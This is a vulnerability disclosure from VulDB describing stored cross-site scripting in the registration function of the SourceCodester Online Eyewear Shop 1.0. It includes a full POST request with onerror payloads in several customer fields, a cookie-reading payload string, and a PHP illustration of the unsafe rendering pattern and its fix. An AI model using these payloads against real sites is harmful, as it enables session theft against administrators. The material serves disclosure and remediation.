Submission #85725: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting information

Title: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting

Description:
The application Online Eyewear Shop 1.0 is vulnerable to Stored Cross-Site Scripting attacks.

The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:
- http://localhost/oews/classes/Users.php?f=registration

The vulnerable function is "registration" in the following source code file:
- oews/classes/Users.php

This function allows a new customer user to be registered or an existing one to be edited. The application does not correctly sanitize the user-provided input, and the XSS payload "><img src=X onerror=prompt(document.cookie)> can be submitted in any of the following parameters:
- "firstname"
- "middlename"
- "lastname"
- "email"
- "contact"

Here is an example POST request:
'''
POST /oews/classes/Users.php?f=registration HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808
Content-Length: 1274
Connection: close
Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo

-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="id"

4
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="firstname"

XSS"><img src=X onerror=prompt(1)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="middlename"

"><img src=X onerror=prompt(2)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="lastname"

TEST"><img src=X onerror=prompt(3)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="gender"

Male
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="email"

[email protected]"><img src=X onerror=prompt(5)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="contact"

444"><img src=X onerror=prompt(6)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="password"

-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

-----------------------------110352294825610921354088773808--
'''

This information is stored in the database for the current user, and the script executes whenever the related fields are printed on the website. For this reason, any administrator user is a potential victim of this attack if she tries to edit that customer or simply opens the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the values of the following fields:
- First Name
- Middle Name
- Last Name
- Email
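The root cause described above is user-controlled text being written back into HTML without encoding. The block below is an added illustration, not code from the Online Eyewear Shop project or from the submitter: it reconstructs, in PHP, the kind of output pattern that makes the stored values executable and the hardened alternative (encode at the output boundary, validate before storing). The field names and payload strings are taken from the report; the `$customer` array, the render helpers and the validation rules are assumptions.

```php
<?php
// Added illustration; not the Online Eyewear Shop source. Field names and
// payloads come from the report, everything else is assumed.

// Constructed sample: the values a customer record might hold after the
// registration request in the report was accepted and stored.
$customer = [
    'firstname'  => 'XSS"><img src=X onerror=prompt(1)>',
    'middlename' => '"><img src=X onerror=prompt(2)>',
    'lastname'   => 'TEST"><img src=X onerror=prompt(3)>',
    'email'      => 'user@example.invalid"><img src=X onerror=prompt(5)>', // constructed address
    'contact'    => '444"><img src=X onerror=prompt(6)>',
];

// Vulnerable pattern (assumed shape of the customer list / edit form): the
// stored value is concatenated straight into markup. The leading quote in the
// value closes the attribute, and the <img> element that follows becomes live
// markup in the administrator's browser.
function render_row_unsafe(array $c): string {
    return '<tr><td>' . $c['firstname'] . '</td>'
         . '<td><input type="text" name="firstname" value="' . $c['firstname'] . '"></td></tr>';
}

// Hardened pattern: encode every dynamic value at the point it is written into
// HTML. ENT_QUOTES escapes both quote styles so a value cannot terminate an
// attribute; ENT_SUBSTITUTE returns a replacement character instead of an empty
// string on malformed UTF-8, so the row still renders.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_row_safe(array $c): string {
    return '<tr><td>' . h($c['firstname']) . '</td>'
         . '<td><input type="text" name="firstname" value="' . h($c['firstname']) . '"></td></tr>';
}

// Defence in depth on the registration handler: reject values that cannot be a
// legitimate name, e-mail address or phone number before they reach the
// database. Names can legitimately contain apostrophes and hyphens, so this
// complements output encoding rather than replacing it. Rules are assumptions.
function validate_registration(array $in): array {
    $errors = [];
    foreach (['firstname', 'middlename', 'lastname'] as $f) {
        // Letters (any script), combining marks, apostrophe, space, dot, hyphen.
        if (!preg_match('/^[\p{L}\p{M}\' .-]{0,100}$/u', $in[$f] ?? '')) {
            $errors[] = "$f contains disallowed characters";
        }
    }
    if (filter_var($in['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email is not a valid address';
    }
    if (!preg_match('/^\+?[0-9 ()-]{3,20}$/', $in['contact'] ?? '')) {
        $errors[] = 'contact is not a valid phone number';
    }
    return $errors;
}

// Unsafe rendering emits the <img ... onerror=...> element verbatim.
echo render_row_unsafe($customer), PHP_EOL;
// Safe rendering emits the same characters as entity-encoded, inert text.
echo render_row_safe($customer), PHP_EOL;
// Every one of the five fields in the sample fails validation.
print_r(validate_registration($customer));
```

The encoding step is the one that actually closes the hole: the same `h()` wrapper has to cover every place the customer fields are printed, including the "Customer List View" and the edit form, because a single unencoded sink is enough for the stored payload to run. Validation on the registration side reduces what gets stored in the first place but cannot be relied on alone, since an administrator may also edit the record through another path.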
User: CP_offensive_team (UID 40465)
Submission: 07/02/2023 18:07 (3 years ago)
Moderation: 07/02/2023 20:59 (3 hours later)
Status: Accepted
VulDB Entry: 220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact Cross Site Scripting]
Points: 17
